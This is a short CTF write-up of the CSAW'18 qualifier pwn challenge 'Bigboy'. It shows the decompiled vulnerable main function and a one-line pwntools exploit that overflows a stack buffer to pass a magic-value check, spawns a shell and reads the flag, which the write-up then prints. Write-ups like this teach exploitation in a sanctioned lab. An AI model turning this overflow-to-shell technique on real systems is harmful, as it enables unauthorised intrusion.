+++
title = "Bigboy"
description = "CSAW'18 CTF Qualification - Pwn (25 pts)"
keywords = "Pwn, Buffer Overflow, WriteUp, CTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = 2018-09-16T18:18:28+02:00
weight = 20
draft = false
bref = "CSAW'18 CTF Qualification - Pwn (25 pts)"
toc = true
aliases = [
    "/docs/csawqual_2018_bigboy",
]
+++

CSAW'18 CTF Qualification: Bigboy
==============================

| Event                     | Challenge     | Category      | Points | Solves      |
|---------------------------|---------------|---------------|--------|-------------|
| CSAW'18 CTF Qualification | Bigboy        | Pwn           | 25     | 656         |


### Description
> Only big boi pwners will get this one!

> nc pwn.chal.csaw.io 9000

You can download the elf file here : [boi](/files/csawquals_2018/bigboi/boi)


### TL;DR
This challenge is a simple buffer overflow with a check that `may` lead to
code execution. It's an easy pwn, so one liner is the way to go !


### Methology

Step 1 : Use ida to decompile the program and not lose time, then, overflow with
the good value many time, to access the "/bin/bash".

```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 buf; // [rsp+10h] [rbp-30h]
  __int64 v5; // [rsp+18h] [rbp-28h]
  __int64 v6; // [rsp+20h] [rbp-20h]
  int v7; // [rsp+28h] [rbp-18h]
  unsigned __int64 v8; // [rsp+38h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  buf = 0LL;
  v5 = 0LL;
  v6 = 0LL;
  v7 = 0;
  HIDWORD(v6) = -559038737;
  puts("Are you a big boiiiii??");
  read(0, &buf, 0x18uLL);
  if ( HIDWORD(v6) == 0xCAF3BAEE )
    run_cmd("/bin/bash", &buf);
  else
    run_cmd("/bin/date", &buf);
  return 0;
}
```

Step 2 : Print the cmd you want to run.

```bash
python2 -c 'from pwn import *; print p32(0xCAF3BAEE) * 6; print "cat flag.txt"' | nc pwn.chal.csaw.io 9000
```

Step 3 : Enjoy your free 25 points yayyyy ! \o/

The flag is : __flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}__


-Laluka
